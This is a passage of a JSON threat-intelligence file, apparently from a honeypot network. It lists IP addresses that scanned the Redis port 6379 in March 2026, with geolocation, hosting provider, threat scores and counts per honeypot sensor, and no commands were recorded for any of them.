      "last_seen": "2026-03-07T11:48:04.847Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 14.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 24.6,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.2
      },
      "reputation_metrics": {
        "total_events_30d": 291,
        "days_active_30d": 1,
        "ports_targeted_30d": 159,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-07T11:46:55+00:00",
        "last_seen_30d": "2026-03-07T11:57:05.311000+00:00",
        "days_since_last_seen": 24
      },
      "honeypot_breakdown_30d": {
        "Suricata": 161,
        "Honeytrap": 110,
        "Dionaea": 9,
        "Cowrie": 4,
        "Miniprint": 3,
        "Adbhoney": 2,
        "Redishoneypot": 2
      }
    },
    "62.146.237.25": {
      "attack_count": 9,
      "first_seen": "2026-03-08T04:14:59.000Z",
      "last_seen": "2026-03-08T04:16:06.109Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Singapore",
      "country_code": "SG",
      "city": "Singapore",
      "asn": 141995,
      "as_org": "Contabo Asia Private Limited",
      "threat_score": 4.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.23
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-08T04:14:59+00:00",
        "last_seen_30d": "2026-03-08T04:16:06.109000+00:00",
        "days_since_last_seen": 23
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "178.83.200.3": {
      "attack_count": 8,
      "first_seen": "2026-03-10T10:53:50.000Z",
      "last_seen": "2026-03-18T13:56:12.948Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United Kingdom",
      "country_code": "GB",
      "city": null,
      "asn": 212238,
      "as_org": "Datacamp Limited",
      "threat_score": 70.0,
      "threat_level": "high",
      "score_components": {
        "frequency": 20.0,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 99,
        "days_active_30d": 30,
        "ports_targeted_30d": 48,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T11:12:32.611000+00:00",
        "last_seen_30d": "2026-03-31T19:23:32.944000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 99
      }
    },
    "115.68.229.247": {
      "attack_count": 6,
      "first_seen": "2026-03-03T15:06:34.000Z",
      "last_seen": "2026-03-03T15:08:09.862Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "South Korea",
      "country_code": "KR",
      "city": null,
      "asn": 38700,
      "as_org": "SMILESERV",
      "threat_score": 0.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T15:08:09.862000+00:00",
        "last_seen_30d": "2026-03-03T15:08:09.862000+00:00",
        "days_since_last_seen": 28
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "147.182.172.160": {
      "attack_count": 6,
      "first_seen": "2026-03-04T21:13:07.000Z",
      "last_seen": "2026-03-04T21:14:43.005Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 3.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 13.4,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 22,
        "days_active_30d": 1,
        "ports_targeted_30d": 22,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-04T10:44:49.825000+00:00",
        "last_seen_30d": "2026-03-04T22:41:25.619000+00:00",
        "days_since_last_seen": 27
      },
      "honeypot_breakdown_30d": {
        "Suricata": 22
      }
    },
    "161.97.166.219": {
      "attack_count": 6,
      "first_seen": "2026-03-04T05:53:57.000Z",
      "last_seen": "2026-03-04T05:55:00.588Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "France",
      "country_code": "FR",
      "city": "Lauterbourg",
      "asn": 51167,
      "as_org": "Contabo GmbH",
      "threat_score": 0.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-04T05:55:00.588000+00:00",
        "last_seen_30d": "2026-03-04T05:55:00.588000+00:00",
        "days_since_last_seen": 27
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "167.248.133.112": {
      "attack_count": 6,
      "first_seen": "2026-03-05T06:10:45.000Z",
      "last_seen": "2026-03-05T06:12:21.221Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 53.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 29.8,
        "persistence": 18.3,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 952,
        "days_active_30d": 22,
        "ports_targeted_30d": 874,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:36:30.744000+00:00",
        "last_seen_30d": "2026-03-23T19:52:17.667000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 952
      }
    },
    "199.45.154.188": {
      "attack_count": 6,
      "first_seen": "2026-03-02T20:10:40.000Z",
      "last_seen": "2026-03-02T20:11:48.301Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398722,
      "as_org": "Censys, Inc.",
      "threat_score": 74.4,
      "threat_level": "high",
      "score_components": {
        "frequency": 19.4,
        "persistence": 25,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 88,
        "days_active_30d": 30,
        "ports_targeted_30d": 73,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T01:20:06.418000+00:00",
        "last_seen_30d": "2026-03-31T16:33:41.459000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 86,
        "ConPot": 2
      }
    },
    "68.183.104.22": {
      "attack_count": 6,
      "first_seen": "2026-03-02T11:43:00.000Z",
      "last_seen": "2026-03-02T11:44:10.664Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 0.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T11:44:10.664000+00:00",
        "last_seen_30d": "2026-03-02T11:44:10.664000+00:00",
        "days_since_last_seen": 29
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "101.201.71.213": {
      "attack_count": 5,
      "first_seen": "2026-03-08T17:54:32.000Z",
      "last_seen": "2026-03-08T17:55:36.036Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 1.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.23
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-08T17:55:36.036000+00:00",
        "last_seen_30d": "2026-03-08T17:55:36.036000+00:00",
        "days_since_last_seen": 23
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "104.236.54.82": {
      "attack_count": 5,
      "first_seen": "2026-03-03T16:48:14.000Z",
      "last_seen": "2026-03-03T16:49:17.194Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Clifton",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 6.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 30,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 1902,
        "days_active_30d": 1,
        "ports_targeted_30d": 1903,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-03T11:04:46.981000+00:00",
        "last_seen_30d": "2026-03-03T17:28:17.199000+00:00",
        "days_since_last_seen": 28
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1874,
        "Honeytrap": 27,
        "Sentrypeer": 1
      }
    },
    "106.55.63.187": {
      "attack_count": 5,
      "first_seen": "2026-03-09T06:20:46.000Z",
      "last_seen": "2026-03-09T06:21:49.988Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Guangzhou",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 2.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.27
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-09T06:21:49.988000+00:00",
        "last_seen_30d": "2026-03-09T06:21:49.988000+00:00",
        "days_since_last_seen": 22
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "139.144.239.72": {
      "attack_count": 5,
      "first_seen": "2026-03-14T12:37:02.000Z",
      "last_seen": "2026-03-14T12:38:12.578Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Cedar Knolls",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.8,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.8,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 190,
        "days_active_30d": 30,
        "ports_targeted_30d": 177,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T11:51:42.558000+00:00",
        "last_seen_30d": "2026-03-31T23:35:49.565000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 190
      }
    },
    "167.94.138.147": {
      "attack_count": 5,
      "first_seen": "2026-03-18T04:32:23.000Z",
      "last_seen": "2026-03-18T04:33:30.123Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 40.1,
      "threat_level": "medium",
      "score_components": {
        "frequency": 18.5,
        "persistence": 16.7,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 70,
        "days_active_30d": 20,
        "ports_targeted_30d": 64,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T02:17:26.179000+00:00",
        "last_seen_30d": "2026-03-21T05:39:37.313000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 70
      }
    },
    "173.255.223.73": {
      "attack_count": 5,
      "first_seen": "2026-03-15T12:34:58.000Z",
      "last_seen": "2026-03-15T12:35:58.330Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Fremont",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 71.6,
      "threat_level": "high",
      "score_components": {
        "frequency": 21.6,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 146,
        "days_active_30d": 30,
        "ports_targeted_30d": 136,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T09:02:35.390000+00:00",
        "last_seen_30d": "2026-03-31T15:45:23.647000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 146
      }
    },
    "20.87.233.62": {
      "attack_count": 5,
      "first_seen": "2026-03-08T14:19:52.000Z",
      "last_seen": "2026-03-08T14:20:57.459Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "South Africa",
      "country_code": "ZA",
      "city": "Johannesburg",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 1.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.23
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-08T14:20:57.459000+00:00",
        "last_seen_30d": "2026-03-08T14:20:57.459000+00:00",
        "days_since_last_seen": 23
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "216.180.246.72": {
      "attack_count": 5,
      "first_seen": "2026-03-11T05:05:05.000Z",
      "last_seen": "2026-03-11T05:06:45.108Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 34.1,
      "threat_level": "low",
      "score_components": {
        "frequency": 17.0,
        "persistence": 14.2,
        "diversity": 10,
        "spread": 10,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 50,
        "days_active_30d": 17,
        "ports_targeted_30d": 5,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-05T01:52:39+00:00",
        "last_seen_30d": "2026-03-21T08:26:26.437000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 34,
        "Honeytrap": 16
      }
    },
    "23.92.27.179": {
      "attack_count": 5,
      "first_seen": "2026-03-28T12:39:12.000Z",
      "last_seen": "2026-03-28T12:40:14.051Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Fremont",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.2,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 165,
        "days_active_30d": 30,
        "ports_targeted_30d": 155,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:51:33.500000+00:00",
        "last_seen_30d": "2026-03-31T18:55:36.481000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 165
      }
    },
    "47.94.213.192": {
      "attack_count": 5,
      "first_seen": "2026-03-10T14:50:21.000Z",
      "last_seen": "2026-03-10T14:51:28.859Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 2.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-10T14:51:28.859000+00:00",
        "last_seen_30d": "2026-03-10T14:51:28.859000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "81.68.224.112": {
      "attack_count": 5,
      "first_seen": "2026-03-28T18:02:32.000Z",
      "last_seen": "2026-03-28T18:03:42.376Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 7.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-28T18:03:42.376000+00:00",
        "last_seen_30d": "2026-03-28T18:03:42.376000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "85.11.183.35": {
      "attack_count": 5,
      "first_seen": "2026-03-04T01:12:04.000Z",
      "last_seen": "2026-03-04T01:13:10.192Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United Kingdom",
      "country_code": "GB",
      "city": "London",
      "asn": 201002,
      "as_org": "PebbleHost Ltd",
      "threat_score": 41.9,
      "threat_level": "medium",
      "score_components": {
        "frequency": 25.3,
        "persistence": 15.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 340,
        "days_active_30d": 19,
        "ports_targeted_30d": 352,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:28:07.177000+00:00",
        "last_seen_30d": "2026-03-20T12:31:55.971000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Suricata": 340
      }
    },
    "13.219.1.233": {
      "attack_count": 4,
      "first_seen": "2026-03-07T17:52:20.000Z",
      "last_seen": "2026-03-07T17:53:28.061Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 83.9,
      "threat_level": "critical",
      "score_components": {
        "frequency": 23.9,
        "persistence": 25,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 246,
        "days_active_30d": 30,
        "ports_targeted_30d": 87,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T03:47:33.377000+00:00",
        "last_seen_30d": "2026-03-31T22:14:25.009000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 214,
        "Honeytrap": 29,
        "ConPot": 3
      }
    },
    "167.172.248.108": {
      "attack_count": 4,
      "first_seen": "2026-03-11T12:22:42.000Z",
      "last_seen": "2026-03-11T12:23:44.785Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Clifton",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 20.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 30,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 1895,
        "days_active_30d": 1,
        "ports_targeted_30d": 1897,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-11T12:02:34+00:00",
        "last_seen_30d": "2026-03-11T13:50:36.282000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1868,
        "Honeytrap": 27
      }
    },
    "212.64.201.34": {
      "attack_count": 4,
      "first_seen": "2026-03-28T22:10:42.000Z",
      "last_seen": "2026-03-28T22:11:45.410Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "T\u00fcrkiye",
      "country_code": "TR",
      "city": null,
      "asn": 197450,
      "as_org": "Sunucun Bilgi Iletisim Teknolojileri ve Ticaret Ltd. Sti.",
      "threat_score": 55.7,
      "threat_level": "medium",
      "score_components": {
        "frequency": 16.0,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 40,
        "days_active_30d": 25,
        "ports_targeted_30d": 20,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-04T13:28:25.609000+00:00",
        "last_seen_30d": "2026-03-28T22:11:52.399000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 40
      }
    },
    "64.62.197.118": {
      "attack_count": 4,
      "first_seen": "2026-03-09T11:40:19.000Z",
      "last_seen": "2026-03-09T11:41:28.715Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 32.8,
      "threat_level": "low",
      "score_components": {
        "frequency": 10.8,
        "persistence": 15.0,
        "diversity": 16,
        "spread": 10,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 18,
        "ports_targeted_30d": 8,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T18:24:01.403000+00:00",
        "last_seen_30d": "2026-03-20T11:11:36.532000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Suricata": 9,
        "Honeytrap": 3
      }
    },
    "74.82.47.20": {
      "attack_count": 4,
      "first_seen": "2026-03-22T14:23:00.000Z",
      "last_seen": "2026-03-22T14:24:03.524Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Gunnison",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 63.7,
      "threat_level": "high",
      "score_components": {
        "frequency": 12.0,
        "persistence": 21.7,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 16,
        "days_active_30d": 26,
        "ports_targeted_30d": 10,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-06T04:05:13+00:00",
        "last_seen_30d": "2026-03-31T08:06:40.519000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 15,
        "Honeytrap": 1
      }
    },
    "194.50.16.198": {
      "attack_count": 4929,
      "first_seen": "2026-03-02T02:48:05.000Z",
      "last_seen": "2026-03-28T15:42:05.222Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Netherlands",
      "country_code": "NL",
      "city": "Amsterdam",
      "asn": 49870,
      "as_org": "Alsycon B.V.",
      "threat_score": 87.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 22.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 7836245,
        "days_active_30d": 27,
        "ports_targeted_30d": 68109,
        "honeypots_triggered_30d": 20,
        "first_seen_30d": "2026-03-02T00:00:00+00:00",
        "last_seen_30d": "2026-03-28T15:51:07.755000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 5258963,
        "Honeytrap": 2563917,
        "Miniprint": 2239,
        "Cowrie": 2178,
        "Mailoney": 1946,
        "Dionaea": 1631,
        "ConPot": 1628,
        "Redishoneypot": 1073,
        "Adbhoney": 715,
        "Dicompot": 558,
        "Honeyaml": 296,
        "H0neytr4p": 256,
        "Tanner": 226,
        "Ipphoney": 223,
        "ElasticPot": 222,
        "Ciscoasa": 38,
        "Medpot": 32,
        "CitrixHoneypot": 27,
        "Sentrypeer": 9
      }
    },
    "3.129.187.38": {
      "attack_count": 398,
      "first_seen": "2026-03-04T10:35:08.000Z",
      "last_seen": "2026-03-31T03:17:58.324Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 100,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 11950,
        "days_active_30d": 30,
        "ports_targeted_30d": 177,
        "honeypots_triggered_30d": 14,
        "first_seen_30d": "2026-03-02T00:22:49.570000+00:00",
        "last_seen_30d": "2026-03-31T21:16:51.803000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7776,
        "Honeytrap": 3509,
        "Dionaea": 154,
        "ConPot": 134,
        "Cowrie": 119,
        "Redishoneypot": 106,
        "Mailoney": 90,
        "Ipphoney": 21,
        "Tanner": 13,
        "Honeyaml": 11,
        "CitrixHoneypot": 6,
        "Ciscoasa": 4,
        "H0neytr4p": 4,
        "ElasticPot": 3
      }
    },
    "61.242.178.28": {
      "attack_count": 76,
      "first_seen": "2026-03-02T05:38:26.000Z",
      "last_seen": "2026-03-30T19:21:19.607Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 47.3,
      "threat_level": "medium",
      "score_components": {
        "frequency": 12.8,
        "persistence": 24.2,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 19,
        "days_active_30d": 29,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T05:39:34.485000+00:00",
        "last_seen_30d": "2026-03-30T19:21:19.607000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 13,
        "Redishoneypot": 6
      }
    },
    "20.116.232.29": {
      "attack_count": 71,
      "first_seen": "2026-03-06T03:39:34.000Z",
      "last_seen": "2026-03-19T09:26:47.148Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": "Toronto",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 23.0,
      "threat_level": "low",
      "score_components": {
        "frequency": 14.6,
        "persistence": 11.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.6
      },
      "reputation_metrics": {
        "total_events_30d": 29,
        "days_active_30d": 14,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-06T03:39:34+00:00",
        "last_seen_30d": "2026-03-19T09:26:47.148000+00:00",
        "days_since_last_seen": 12
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 21,
        "Suricata": 8
      }
    },
    "218.78.131.154": {
      "attack_count": 69,
      "first_seen": "2026-03-03T08:32:31.000Z",
      "last_seen": "2026-03-31T10:59:00.342Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 4812,
      "as_org": "China Telecom Group",
      "threat_score": 42.3,
      "threat_level": "medium",
      "score_components": {
        "frequency": 11.1,
        "persistence": 24.2,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 13,
